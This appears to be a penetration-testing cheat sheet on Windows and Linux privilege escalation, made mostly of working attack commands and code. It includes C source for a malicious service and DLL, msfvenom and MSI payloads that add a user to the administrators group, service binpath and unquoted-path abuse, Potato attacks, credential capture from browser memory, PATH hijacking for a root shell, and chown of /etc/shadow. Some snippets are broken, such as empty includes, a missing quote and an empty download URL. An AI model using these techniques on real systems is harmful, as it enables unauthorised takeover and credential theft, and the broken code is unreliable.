# Privilege Escalation
## Windows
{% hint style="info" %}
The use of SysInternals is recommended but not necessary. It can be very useful when doing pentests but not so very for very obvious reasons. A simple signature check on the file and any AV/IDS will start flip floppin.\
{% endhint %}
## PowerShell
### Download file
```
Invoke-WebRequest -OutFile peas -Uri http:///PEAS
```
### AutoRun
Search for autoruns and check if you have WRITE permissions on it.\
If you do have WRITE, simply replace it with your payload. Of course, if the software is somewhat "important", the user could then notice that something is not quite right.
```
sysinternals/autoruns64.exe
sysinternals/accesschk64.exe -wvu "C:\Program Files\Autorun Program"
```
### AlwaysInstallElevated
{% hint style="info" %}
Windows OS comes installed with a Windows Installer engine which is used by **MSI packages** for the installation of applications. These MSI packages can be installed with elevated privileges for non-admin users
{% endhint %}
Check if AlwaysInstallElevated registry key value 1. If so, simply craft a malicious .MSI package containing your payload and literally install it on the machine
```
reg query HKLM\Software\Policies\Microsoft\Windows\Installer #LocalMachine
reg query HKCU\Software\Policies\Microsoft\Windows\Installer #CurrentUser
```
You can now copy the payload onto the victim's pc and run it.
```
msiexec /quiet /qn /i C:\Temp\payload.msi
```
### Registry
With **PowerShell** check for registry services
```
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
```
The following is a simple C service for windows. You can tweak it a bit to get desired results. Then you can compile it with **x86\_64-w64-mingw32-gcc** or any appropriate compiler for the current situation.
```
#include
#include
#define SLEEP_TIME 5000
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;
void ServiceMain(int argc, char** argv);
void ControlHandler(DWORD request);
int Run()
{
system("cmd.exe /k net localgroup administrators user /add");
return 0;
}
int main()
{
SERVICE_TABLE_ENTRY ServiceTable[2];
ServiceTable[0].lpServiceName = ThiccService";
ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
ServiceTable[1].lpServiceName = NULL;
ServiceTable[1].lpServiceProc = NULL;
StartServiceCtrlDispatcher(ServiceTable);
return 0;
}
void ServiceMain(int argc, char** argv)
{
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler);
Run();
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (hStatus, &ServiceStatus);
while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
{
Sleep(SLEEP_TIME);
}
return;
}
void ControlHandler(DWORD request)
{
switch(request)
{
case SERVICE_CONTROL_STOP:
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (hStatus, &ServiceStatus);
return;
case SERVICE_CONTROL_SHUTDOWN:
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (hStatus, &ServiceStatus);
return;
default:
break;
}
SetServiceStatus (hStatus, &ServiceStatus);
return;
}
```
You can now add the new service path to the registry
```
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\payload.exe /f
```
### Executable files
Check if executable has weak or misconfigured permissions. If you have **FILE ALL ACCESS,** you can copy your payload over the service/executable and execute it.
```
sysinternals/accesschk64.exe -wvu "C:\Program Files\weakperms.exe"
```
### Startup
In a command prompt, check for startup applications. Check if **BUILTIN/Users** or any compromised user with **(F)** which means FULL permissions. If such thing occur, you can, again, overwrite said startup executable for your own payload and wait for admin (or any other user) to login.
```
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
```
### DLL Hijack
{% hint style="info" %}
If **SafeDllSearchMode** is enabled, the search order is as follows:
1. The directory from which the application loaded.
2. The system directory. Use the [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.
3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
4. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
5. The current directory.
6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
If **SafeDllSearchMode** is disabled, the search order is as follows:
1. The directory from which the application loaded.
2. The current directory.
3. The system directory. Use the [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.
4. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
5. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
{% endhint %}
7. **DLL replacement**: replace a legitimate DLL with an evil DLL.
1. **DLL PROXYING:** Keep original DLL functionalities.
8. **DLL search order hijacking**: Hijacking the search order takes place by putting the evil DLL in a location that is searched in before the actual DLL.
9. [**Phantom DLL hijacking**](#find-missing-dlls): drop an evil DLL in place of a missing/non-existing DLL
10. **DLL redirection**: change the location in which the DLL is searched for, e.g. by editing the `%PATH%` environment variable, or `.exe.manifest` / `.exe.local` files to include the folder containing the evil DLL.
11. **WinSxS DLL replacement**: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often referred to as DLL [side-loading](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf).
12. **Relative path DLL Hijacking:** copy (and optionally rename) the legitimate application to a user-writeable folder, alongside the evil DLL. In the way this is used, it has similarities with (Signed) [Binary Proxy Execution](https://attack.mitre.org/techniques/T1218/). A variation of this is ‘[*bring your own LOLBIN*](https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/) in which the legitimate application is brought with the evil DLL (rather than copied from the legitimate location on the victim’s machine).
#### Find missing DLLs
#### Custom Dlls
```
#include
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
switch(dwReason){
case DLL_PROCESS_ATTACH:
system("whoami > C:\\temp\\whoami.lol");
WinExec("calc.exe", 0); //no redirect like system
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
```
### BinPath
```
sysinternals/accesschk64.exe -wuvc daclsvc
```
If you see **SERVICE\_CHANGE\_CONFIG,** you can exploit this like so
```
sc config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
```
### Unquoted Path
A classic if you ask me.\
If the path to an executable is not inside quotes, Windows will try to execute every ending before a space. E.g:\
\&#xNAN;*C:\Program Files\Some Folder\Service.exe* Windows will try:
```
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
```
```
sc qc unquotedsvc #specific bin
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ #List all services
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v """ #Not only auto services
```
Craft a payload with msfvenom for POC
```
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o malicious.exe
```
Now copy this payload into the unquoted path, E.G:
Imagine the vulnerable service path as follow:
*C:\Program Files\\**Some Folder**\Service.exe*\
You could copy your malicious payload here:\
\&#xNAN;*C:\Program Files\Service.exe*
### Password Mining
* C:\Windows\Panther\Unattend.xml
#### HTTP\_BASIC Memory
```
msf
use auxiliary/server/capture/http_basic
set uripath x
run
```
On victim's machine browse to **** and dump iexplore.exe memory using taskmgr or any appropriate tool. Copy said dump to your box and run **strings** against the memory dump. You should be able to grep/find the **Authorization: Basic** header holding the base64 encoded password.
### Potatoes
#### Hot potato
```
powershell.exe -nop -ep bypass
Import-Module tater.ps1
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
```
### KERNEL
One quick and dirty way to find common vulnerabilities in the kernel is obtain a meterpreter shell and call the post exploitation module **local\_exploit\_suggester**.
## Linux
Gimme the root !
### Sudo group - PKEXEC
If the user you are impersonating is a member of the Sudo group, **pkexec** allows an authorized user to execute commands as another user. Therefore, we could use`pkexec /bin/bash` to spawn a shell as root. However, there is known issue that “pkexec fails in a non-graphical environment. To solve this, we needed to create two SSH connections as the user you have access to
The process:
* Opened two SSH connections as user Alice
* On the first SSH session:
```
echo $$ #get session pid
```
* On the second session (replace {pid} with output of earlier command)
```
pkttyagent -p {pid}
```
* On the first session:
```
pkexec /bin/bash
```
* On the second session, entered the password for Alice
### Any sudo?
check if you're allowed to execute some stuff as sudo
```
sudo -l
```
### Find user's files
```
find / -user www-data -type f 2>&1 | grep -v "Permission" | grep -v "No such"
```
### CVE-2021-3156 - Sudo HEAP Overflow
Check if the box is vulnerable by running:
```
$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')
```
If vulnerable, console will show:
\
## SUID
If a script on the machine has the SUID bit set, it might be possible to exploit it.
```
find / -perm -u=s -type f 2>/dev/null
```
### Crontab
Check for any misconfigured scripts
```
cat /etc/crontab
```
### Environment variables
If a script is using another binaries (like **cp** in example below) and it doesn't specify the FULL path, you might be able to hijack this by creating your own binary and exporting the PATH yourself.
Let say you find this script which creates a backup of certain files on the system.
```
cp /home/user/archangel/myfiles/* /opt/backupfiles
```
You could exploit it by creating **your** own version of **cp**. Which of course will be a shell running as root.
```
echo '/bin/bash' > some_bin
chmod +x some_bin
export PATH=.:$PATH
```
```
cat > some_bin << EOF
> #!/bin/bash
> /bin/bash -i
> EOF
chmod +x some_bin
export PATH=.:$PATH
```
## Linux Capabilities
### CAP\_CHOWN
Lets suppose the **`python`** binary has this capability, you can **change** the **owner** of the **shadow** file, **change root password**, and escalate privileges:
```bash
python -c 'import os;os.chown("/etc/shadow",1000,1000)'
```
Or with the **`ruby`** binary having this capability:
```bash
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
```